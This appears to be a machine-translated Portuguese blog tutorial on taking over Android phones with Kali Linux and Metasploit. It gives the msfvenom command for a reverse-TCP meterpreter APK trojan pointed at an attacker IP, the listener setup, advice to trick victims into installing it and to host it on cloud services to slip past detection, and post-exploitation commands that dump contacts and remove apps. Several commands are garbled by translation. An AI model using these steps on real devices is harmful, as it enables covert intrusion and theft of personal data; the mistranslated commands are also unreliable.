SL- 307

Entrando no sistema operacional Android remotamente usando Kali Linux

Utilizaremos msfvenom para criar uma carga útil e reservá-la como um arquivo ‘.apk’. Na execução da geração de um payload, agora temos que enquadrar um listener para o framework Metasploit. Então, temos que manipular a vítima para que ela seja convencida a baixar aquela carga útil ou o ‘.apk’ do arquivo gerado anteriormente. Normalmente, a engenharia social é a manipulação psicológica de pessoas para que executem ações ou divulguem informações confidenciais. Agora, depois que a vítima instala o arquivo malévolo, o invasor pode facilmente recuperar uma sessão do meterpreter no Metasploit. Você também pode hackear um dispositivo Android pela Internet utilizando seu IP público/externo no LHOST e também pelo conceito de ‘encaminhamento de porta’.

Nota: Use as técnicas abaixo apenas para fins instrutivos/teste em seu próprio Wi-Fi ou com o consentimento do proprietário. Tente não utilizar isso para fins malignos. 

 

Gerando a carga útil

1. Digite “ ifconfig ” na sessão do terminal para visualizar a configuração da interface de rede do dispositivo que estamos usando para executar o ataque.

ifconfig

ifconfig

 

Aqui:

1. eth0 é a primeira interface Ethernet (consiste em ‘inet’ que mostra o endereço IP (Protocolo de Internet) de nossa máquina atacante).

2. lo é a interface Loopback.

Depois de obter o endereço IP da sua interface, usaremos o msfvenom que produzirá uma carga útil para se infiltrar no sistema operacional Android.

2. Listando todas as opções acessíveis com msfvenom. (Isso listará todos os limites que nos ajudarão na produção de nossa carga útil).

msfvenom -h

Agora, a carga útil pode ser salva no formato ‘.exe’, ‘.msi’ ou ‘.apk’, etc., mas para este tutorial, usaremos o formato ‘.apk’ como o dispositivo da vítima usaria um dispositivo Android que suporta extensão ‘ .apk ‘.

3.  Agora temos que criar uma carga útil que possamos executar no dispositivo da vítima para executar o ataque com sucesso.

msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.18.63 LPORT=4444 R> /var/www/androidhack.apk/

Aqui:

1. -p mostra o tipo de carga útil

2. android/meterpreter/reverse_tcp indica que um shell meterpreter reverso seria lançado a partir de um dispositivo Android objetivo.

3. LHOST é o nosso IP, ou seja, o IP do invasor

4. LPORT é a porta de escuta na máquina do invasor.

5. R> /var/www/html gera a saída diretamente no servidor Apache

6. ‘.apk’ é a extensão do arquivo do Trojan criado.

Isso reservaria algum esforço (tempo) para produzir um documento apk de cerca de 10.186 bytes.

Configurando o ataque

1. Primeiramente, precisamos verificar o status do servidor Apache (Web Application Server) e para isso digite os seguintes comandos no terminal

serviço apache2 iniciar
status do serviço apache2

início do serviço apache2

 

Nós podemos usar este servidor web (apache2) para hospedar arquivos, ou podemos colocar no Google Drive ou Dropbox ou qualquer um dos provedores de nuvem que tenham compartilhado arquivos e então podemos colocar esses arquivos no servidor, e então as vítimas não será capaz de detectar qualquer intenção maliciosa porque o Sistema de Detecção de Intrusão na Rede pode ignorar e dizer: Ei! Este é um domínio amigável, vamos deixá-lo de lado.

2.  Agora tudo parece estar configurado corretamente e podemos iniciar o msfconsole.

msfconsole

msfconsole

3.  Use o exploit multi/handler, defina a carga útil igual à gerada anteriormente (isso nos ajudará a gerar um ouvinte).

usar multi/manipulador
definir PAYLOAD android/meterpreter/reverse_tcp

use multi/handler e defina a carga útil para Android no metasploi

4.  Agora usaremos o comando ‘show options’ para ver a configuração, definir os valores LHOST (Local Host) e LPORT (Local Port) iguais aos usados ​​​​na carga útil (digite os seguintes comandos para o mesmo) .

mostrar opções

mostrar opções no metasploit

5.  Aqui o LPORT já está configurado, então só precisamos configurar o LHOST para o IP da nossa máquina atacante, e podemos fazer isso através do seguinte comando:

definir LHOST 192.168.18.63

definir o LHOST no metasploit

6. Agora podemos digitar ‘exploit’ para lançar o ataque desejado.

 
explorar

explorar no metasploit

Assim, assim que executarmos o comando ‘ exploit ‘, o manipulador TCP será iniciado imediatamente. Em cenários da vida real, alguns procedimentos de engenharia social podem ser utilizados para permitir que o objetivo baixe o vingativo arquivo ‘.apk’. Para fins de tutorial, estamos simplesmente fazendo com que a máquina vítima baixe o arquivo no telefone Android.

Executando o ataque

Exploração:

1. Digite o seguinte endereço da web em um navegador da web no telefone da vítima.

(<endereço IP da máquina do invasor>/<nome do trojan criado anteriormente>.apk)
Exemplo neste caso:
192.168.18.63/androidhack.apk

2. Depois de baixar a carga com sucesso, temos que selecionar o aplicativo a ser instalado.

instalando carga útil

Até agora, essa alternativa tem sido vista regularmente quando tentamos introduzir alguns aplicativos externos e, normalmente, os clientes não hesitam em permitir o aplicativo de fontes obscuras.

3.   Ative as configurações para introduzir aplicativos de fontes externas. Por último, clique na opção de instalação na base.

instalando carga útil

Assim que a vítima instalar o aplicativo e executá-lo, a sessão do meterpreter será aberta imediatamente no terminal do invasor.

 

Pós-exploração:

1. Digite “background” e depois “sessions” para listar todas as sessões de onde você pode ver todos os IPs conectados à máquina.

lista de antecedentes e sessões

2. Você pode interagir com qualquer sessão digitando o seguinte comando:

sessões -i [ID da sessão]

Após entrar na sessão, digite “ ajuda ” para listar todos os comandos que podemos apresentar nesta sessão. Você pode ver alguns comandos do sistema de arquivos que são úteis quando você tenta buscar dados ou informações delicados. Ao utilizá-los, você pode, sem dúvida, baixar ou transferir qualquer documento ou dado.

interagindo com as sessões do metasploit

3.  Digite o seguinte comando para ver todos os aplicativos instalados no sistema operacional Android específico.

lista_aplicativos

4. Também podemos desinstalar qualquer aplicativo do dispositivo Android.

desinstalar um aplicativo

5. Agora vamos extrair alguns contatos do dispositivo de destino digitando “dump” e tabulação dupla. Ele mostrará todas as opções para se livrar do dispositivo. Digite “dump_contacts” e entre. Ele separará todos os contatos do gadget Android e os salvará em nosso diretório local. Para ver este documento digite “ls” e “cat [file_name]”

dump_contacts

Isso mostraria o conteúdo do arquivo do contato baixado anteriormente do dispositivo de destino. Esta informação é muito sensível e pode ser explorada por hackers. Existem muitos outros comandos disponíveis no meterpreter. Além disso, tente investigar e entender o que podemos fazer com um dispositivo Android. É por isso que entramos efetivamente no gadget Android usando Kali Linux e Metasploit-Framework. Uma boa dica para ter certeza sobre o seu dispositivo Android é não instalar nenhum aplicativo de uma fonte obscura, mesmo que você realmente queira apresentá-lo, tentar ler e examinar seu código-fonte para ter uma ideia se esse arquivo é malévolo ou não.

Observação:

  • O tutorial acima pode ser implementado com sucesso no caso de um Android 8.0 ou versão inferior.
  • Este tutorial é feito para dar à comunidade uma ideia básica de como os hackers entram em nossos gadgets pessoais, e o método acima é o mais básico, ou seja, primeiro criando uma carga útil do Android por msfvenom e depois explorando-a usando a estrutura Metasploit visto que é entregue usando várias técnicas de engenharia social no telefone da vítima.

Mostrar mais

Artigos relacionados

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Botão Voltar ao topo